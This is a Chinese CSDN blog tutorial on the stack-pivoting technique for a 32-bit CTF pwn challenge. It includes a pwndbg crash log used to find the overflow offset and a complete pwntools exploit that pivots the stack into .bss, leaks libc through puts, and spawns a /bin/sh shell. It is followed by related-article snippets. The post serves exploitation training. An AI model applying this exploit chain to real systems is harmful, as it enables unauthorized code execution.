栈迁移学习

最新推荐文章于 2024-03-13 21:25:44 发布
最新推荐文章于 2024-03-13 21:25:44 发布
阅读量192 收藏
点赞数
文章标签: 迁移学习 ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73481933/article/details/128993710
版权

参考资料https://blog.csdn.net/qq_38154820/article/details/106330238

原理

栈迁移的技巧是劫持栈指针执行攻击者所能控制的内存,在相应位置进行ROP,来解决栈溢出空间大小不足的问题
我们进入一个 函数的时候,会执行call指令
call func(); //push eip+4; push ebp; mov ebp,esp;
call func() 执行完要退出的时候要进行与call func相反的操作(恢复现场)维持栈平衡!
leave; //mov esp,ebp; pop ebp;

ret ; // pop eip
栈迁移 的核心思想就是 将栈 的 esp 和 ebp 转移到一个 输入不受长度限制的 且可控制 的 址处,通常是 bss 段地址! 在最后 ret 的时候 如果我们能够控制得 了 栈顶 esp指向的地址 就想到于 控制了 程序执行流!

32位程序栈迁移

检查保护

在这里插入图片描述

fanfan@ubuntu:~$ cyclic 200
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
pwndbg> r
Starting program: /home/fanfan/pwn challenges/migration 
Try your best :
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab

Program received signal SIGSEGV, Segmentation fault.
0x6161616c in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
[ REGISTERS / show-flags off / show-compact-regs off ]
*EAX  0x40
 EBX  0x0
*ECX  0xffffd4d0 ◂— 'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaa'
*EDX  0x40
*EDI  0xf7fb5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1ead6c
*ESI  0xf7fb5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1ead6c
*EBP  0x6161616b ('kaaa')
*ESP  0xffffd500 ◂— 'maaanaaaoaaapaaa'
*EIP  0x6161616c ('laaa')
────────[ DISASM / i386 / set emulate on ]─────────
Invalid address 0x6161616c
─────────────────────[ STACK ]─────────────────────
00:0000│ esp 0xffffd500 ◂— 'maaanaaaoaaapaaa'
01:0004│     0xffffd504 ◂— 'naaaoaaapaaa'
02:0008│     0xffffd508 ◂— 'oaaapaaa'
03:000c│     0xffffd50c ◂— 'paaa'
04:0010│     0xffffd510 —▸ 0xf7fb5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1ead6c
05:0014│     0xffffd514 —▸ 0xf7ffd000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x2bf24
06:0018│     0xffffd518 —▸ 0xffffd578 —▸ 0xffffd594 —▸ 0xffffd6f5 ◂— '/home/fanfan/pwn challenges/migration'
07:001c│     0xffffd51c ◂— 0x0
───────────────────[ BACKTRACE ]───────────────────
 ► f 0 0x6161616c
   f 1 0x6161616d
   f 2 0x6161616e
   f 3 0x6161616f
   f 4 0x61616170
───────────────────────────────────────────────────
fanfan@ubuntu:~$ cyclic -l 0x6161616c
44

手动测量栈偏移量为44(0x2C),这说明变量buf距离main函数的返回地址为0x2C,那么距离EBP(栈底)的距离为(0x2C-4=0x28=40),从read(0,&buf,0x40u),read函数可以读取0x40的内容放在buf(0x28)中,说明我们只能控制0x40-0x28=24的内容,再加上我们的payload需要泄露libc文件得到system的地址,空间太少了,所以只能进行栈迁移。
在这里插入图片描述

构造payload

exp

先把exp放在这,方便解释

from pwn import *

io=process('./migration')
elf=ELF('./migration')
libc=ELF('/lib/i386-linux-gnu/libc.so.6')
context.log_level="debug"  

buf=elf.bss()+0x500
buf1=elf.bss()+0x400
read_plt=elf.plt['read']
leave_ret=0x08048418
# 0x08048418 : leave ; ret

pay1=b'a'*(0x28)+p32(buf)
pay1+=p32(read_plt)+p32(leave_ret)+p32(0)+p32(buf)+p32(0x100)
io.sendafter('Try your best :\n',pay1)

puts_plt=elf.plt['puts']
pop1ret=0x0804836d
# 0x0804836d : pop ebx ; ret
puts_got=elf.got['puts']

pay2=p32(buf1)+p32(puts_plt)+p32(pop1ret)+p32(puts_got)
pay2+=p32(read_plt)+p32(leave_ret)+p32(0)+p32(buf1)+p32(0x100)
io.sendline(pay2)

puts_addr=u32(io.recv(4))
success("puts_addr = "+hex(puts_addr))
libcbase=puts_addr-libc.symbols['puts']
system_addr=libcbase+libc.symbols['system']

pop3ret=0x08048569
# 0x08048569 : pop esi ; pop edi ; pop ebp ; ret
pay3=p32(buf)+p32(read_plt)+p32(pop3ret)+p32(0)+p32(buf)+p32(0x100)
pay3+=p32(system_addr)+p32(0xdeadbeef)+p32(buf)
io.sendline(pay3)
io.sendline("/bin/sh\x00")

io.interactive()

图解在这里插入图片描述

godarcher
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
迁移
weixin_44932880的博客
10-13 603
leave ret 原理 一次leave 将 rsp指向 原rbp+8 , rbp指向原rbp 的内容, move rsp rbp (rbp的地址赋值给rsp的地址,即rsp指向rbp) pop rbp (rbp指向rsp的内容(rbp的内容),rsp+=8) 一次ret rip指向原rsp的内容,rsp+=8 pop rip 一次leave ret 使rbp指向原rbp的内容,rsp指向 原rbp+16,rip指向原rbp+8 两次leave ret
pwn --迁移
zszcr的博客
04-07 6986
迁移主要是为了解决溢出可以溢出空间大小不足的问题迁移的实现:通过将ebp覆盖成我们构造的fake_ebp ,然后利用leave_ret这个gadget将esp劫持到fake_ebp的地址上leave_ret相当于:mov %ebp,%esp pop %ebp pop %eip接下来拿HITCON-Training-master 的 lab6做例子题目链接:https://github.com...
迁移小总结
weixin_61283545的博客
04-24 406
[BUUCTF]PWN14——not_the_same_3dsctf_2016_mcmuyanga的博客-CSDN博客
PWN——迁移
L2329794714的博客
08-29 1514
简单一句话就是控制esp指针的指向。实现指令:eave;ret 指令Leave等价于:其实就是在做恢复上一次空间的操作。但这过程中能恢复到上次的的关键数据为当前ebp指向地址上值(oldebp),当我们通过溢出覆盖原本的oldebp值时,然后将leave;ret 程序段地址放在返回地址上,那么就可以实现将esp迁移至我们想要的地方(取决于oldebp上的覆盖的地址,注意这里会抬高4字节,64位抬8字节)。第一次leave第一次ret:因为esp还是指向leave;.........
基于tensorflow Inception V3模型迁移学习的图片鉴定分类程序(鉴黄、鉴血腥).zip
最新发布
03-27
【标题】中的“基于tensorflow Inception V3模型迁移学习的图片鉴定分类程序”是指利用TensorFlow框架中的Inception V3模型进行图像识别和分类的一种应用。Inception V3是Google开发的一个深度学习模型,主要用于...
QNX系统学习资料整理
07-03
QNX使用POSIX标准,因此许多C和C++编程经验可以迁移过来,但要注意QNX特有的API和库,如QNX服务框架(QSS)和设备驱动程序接口。 QNX的进程和线程模型: QNX的微内核设计允许高效的进程和线程管理。学习者需要理解...
学习记录Day1(5)
05-28
通过这些学习,不仅可以提升编程技能,还能为未来的职业规划提供指导,包括选择合适的技术,设置明确的学习目标,以及如何通过持续的实践和专注来增强自己的核心竞争力。学习过程中,要关注实际项目经验的积累,...
PB学习资料,很全,学习
01-05
12. **迁移和现代化**:随着技术的发展,PB的应用场景也在发生变化,学习PB的同时,也需要了解如何将PB应用迁移到新的平台或技术,如云服务、移动应用等。 以上只是PowerBuilder学习的一部分要点,实际的学习过程...
做深度学习搭建云平台必备软件
03-18
Docker提供轻量级的容器化技术,方便打包和迁移应用程序,而Kubernetes(K8s)是一个强大的容器编排系统,可管理多个Docker容器的集群。 3. **高性能计算库**:CUDA和cuDNN是NVIDIA提供的GPU加速库,用于提升深度...
论文研究-基于超级基站的协议迁移机制设计与实现 .pdf
08-15
基于超级基站的协议迁移机制设计与实现,杨俊,王园园,传统无线接入网络基站间不共享处理资源、网络负载多变和潮汐效应的存在导致基站资源利用率低与负载均衡的问题。在中科院计算所的
迁移(leave ret)(更适合pwn宝宝体质的迁移~)
Kata_Jhin的博客
05-15 1599
更适合pwn入门新手体质的迁移教程
迁移浅析
qq_43409582的博客
11-23 3989
0x00 线下有道迁移的题目,因为当时没有好好学,对于迁移这一块儿一知半解的,就没出,痛定思痛,在此就好好研究一下。 0x01 前置知识 首先迁移就是因为可写空间太小不够rop,就把迁移到别的地方去构造payload。 而迁移最重要的是两个汇编命令 leave; ret; leave相对于是mov esp,ebp;pop ebp; ret是pop eip; 0x02 stack pivoting 先从32位来理解迁移的利用原理。 stack pivoting,正如它所描述的,该技巧就是劫持指针
【pwn】 关于迁移
wintersun的地带
05-19 3120
[pwn] 关于迁移在我们仅仅只能够控制ebp的情况下,我们怎么才能够控制eip去拿到我们的shell呢。以下为科普以32位程序举例,在使用call这个命令,进入一个函数的时候,程序会进行一系列操作: push eip+4;push ebp;mov ebp,esp;来保护现场,避免执行完函数后堆不平衡以及找不到之前的入口地址。执行完函数后会进行一系列操作来还原现场leave;ret; 这
迁移图解
qq_40410406的博客
11-11 1443
迁移 场景 1 如果程序的保护措施canary开启,会在prev ebp空间的下一个低地址存放一个随机值,当我们溢出时会将这个随机值覆盖,程序检测到这个随机值发生变化以后会自动退出(崩溃),此时就无法进行溢出攻击,所以需要另寻出路。 2 溢出长度不足以使用直接 ROP 3 溢出 payload 会出现空字符截断,且gadget地址含有空字符 4 在泄露地址信息后需要新的 ROP payload 5 如果开启了不可执行保护,就需要迁移到bss段或者data段或者其他位置执行我们的gadge
pwn入门之迁移
wangxunyu6的博客
03-08 1139
迁移可以用于处理溢出的情况。当溢出且可溢出长度不足以容纳 payload 时,可以通过迁移来构建一个新的空间以放下 payload。
PWN 迁移入门解说 [Black Watch 入群题]PWN
weixin_45441024的博客
11-30 612
PWN之迁移解说 适用情况: 1.溢出的长度不足以让我们把ROP写进去 2.程序开启了的不可执行保护 基础知识: 我们迁移的目的就是将我们在上不可执行的链子转移到data段或者bss段上面 ,这里就需要用到leave;ret了,在这一类的题型中我们是构造并使用两次leave,来将ebp转移到我们构造的后门的起始位置。 寻找leave;ret需要用到ROPgadget这个工具 $ ROPgadget --binary '/home/pwn/Desktop/bbys_tu_2016' --only
迁移总结
2302_79899078的博客
03-13 1158
迁移,orw
关于迁移的那些事儿
蚁景网安学院
07-27 427
现在的CTF比赛中很难在大型比赛中看到溢出类型的赛题,而即使遇到了也是多种利用方式组合出现,尤其以迁移配合其他利用方式来达到组合拳的效果,本篇文章意旨通过原理+例题的形式带领读者一步步理解迁移的原理以及在ctf中的应用。......
狂神Docker学习笔记.pdf
03-10
Docker容器具有轻量级、高效灵活、易迁移等优势,能够实现快速部署、持续集成和交付等操作,为开发团队带来极大的便利。此外,Docker还支持多种技术,能够实现跨语言、跨平台的部署,使得不同团队之间能够更好地...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值